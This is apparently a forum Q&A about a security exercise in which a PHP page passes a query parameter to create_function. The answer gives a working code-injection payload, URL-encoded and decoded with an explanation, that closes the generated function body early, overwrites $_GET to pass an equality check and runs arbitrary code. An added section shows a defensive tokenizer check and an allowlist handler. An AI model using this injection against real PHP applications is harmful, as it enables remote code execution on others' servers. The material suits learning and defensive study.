I came across a site where you can do some exercises regarding cyber security.

From what I understand you have to do PHP injection. I looked online for examples but still I could not implement them.

Any help or tips would be appreciated. Also, if this is not the right place to ask this kind of question, please let me know.

The code:

<body> 
    <div class="corb-centered corb-php text-center"> 
      <h3> 
        <a target="_blank" href="/index.php?source">source</a> 
      </h3> 
      <h3> 
        Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a> 
      </h3> 

      <div class="text-left"> 
        <h3>Output : </h3> 
        <pre><code><?php 
        if (isset($_GET['code'])) { 
          $new_func = create_function('', $_GET['code']); 
          if ($_GET['code'] === "echo 'hello foobar';") { 
            $new_func(); 
          } 
        } 
        ?></code></pre> 
      </div> 
    </div>     
</body> 

I've tried everything I know:

ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...
  • What is the problem exactly? Do you receive any errors? The create_function is deprecated, as of PHP 7.2.0. This may be the problem (info here). Alternatively, you could use eval() to execute the given query parameter, instead of transforming it to an anonymous function. Commented Jul 29, 2018 at 18:07
  • This isn't my own code, I was trying to bypass the if function and do code injection Commented Jul 29, 2018 at 19:39

1 Answer

According to the PHP docs:

Caution This function internally performs an eval() and as such has the same security issues as eval().

This is exactly what can be exploited in this case. PHP basically just glues function __lambda_func(<args>) {<code>} together and then evaluates it.

Using the following code parameter should output the string do something else...

/index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F

Decoded version:

} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //

Explained version:

}                                       # end the function body prematurely so the following code is executed immediately
$_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
echo 'do something else..';             # any code that should be executed goes here
//                                      # comment out the function-body closing brace that is added by PHP after the code

3 Comments

Thank you very much, I was surprised it got answered so quickly. But I still have some questions if you don't mind. Where exactly is the code we write inserted? I thought the code would trigger on this line "$new_func = create_function('', $_GET['code']);" so I tried to rewrite the function and execute it immediately after, but you do something else. I notice the bracket is a very important char because without it, it won't work. How should I tackle such an exercise in the future? I spent quite a lot of time on this. And last, why should the string be encoded? Thanks
Yes it does trigger on that line because create_function() evaluates the function definition immediately. Solving these usually requires some knowledge about PHP's internals. In this case, looking at the relevant PHP source code has helped me solve this (PHP docs say that create_function() uses eval() internally).
I was able to solve the exercise thanks to this, thanks for helping me out!
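
The gluing described in the answer, seen from the defender's side, as an added example that is not part of the original answer or of the exercise's code: a tokenizer-only check that shows when a submitted string closes the generated function body early, next to a handler that takes an action name instead of code. The names `body_escapes` and `run_action` and the `action` parameter are assumptions; the check illustrates the problem and is not a filter to rely on.

```php
<?php
// Added illustration; body_escapes(), run_action() and the 'action'
// parameter are hypothetical names, not from the exercise.

// True when $code contains a '}' that closes a block it never opened,
// i.e. it would end the glued "function __lambda_func() {" body early.
// Uses the tokenizer only; nothing in $code is executed.
function body_escapes(string $code): bool
{
    $depth = 0;
    foreach (token_get_all('<?php ' . $code) as $tok) {
        $id   = is_array($tok) ? $tok[0] : null;
        $text = is_array($tok) ? $tok[1] : $tok;
        if ($text === '{' || $id === T_CURLY_OPEN || $id === T_DOLLAR_OPEN_CURLY_BRACES) {
            $depth++;                 // block or "{$var}" interpolation opened
        } elseif ($text === '}' && --$depth < 0) {
            return true;              // unmatched closer: body ends here
        }
    }
    return false;
}

// Hardened handler: the request names an action, the code stays server-side.
function run_action(string $key): string
{
    $actions = [
        'hello' => function (): string { return 'hello foobar'; },
    ];
    if (!isset($actions[$key])) {
        return 'unknown action';
    }
    return htmlspecialchars($actions[$key](), ENT_QUOTES, 'UTF-8');
}

// Constructed inputs: the exercise's start link and the answer's decoded string.
$benign = "echo 'hello foobar';";
$fromAnswer = <<<'TXT'
} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //
TXT;

foreach ([$benign, $fromAnswer] as $code) {
    printf("%-5s %s\n", body_escapes($code) ? 'ESC' : 'ok', $code);
}
echo run_action($_GET['action'] ?? 'hello'), "\n";
echo run_action($fromAnswer), "\n";   // the answer's string is not an allowlisted key
```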
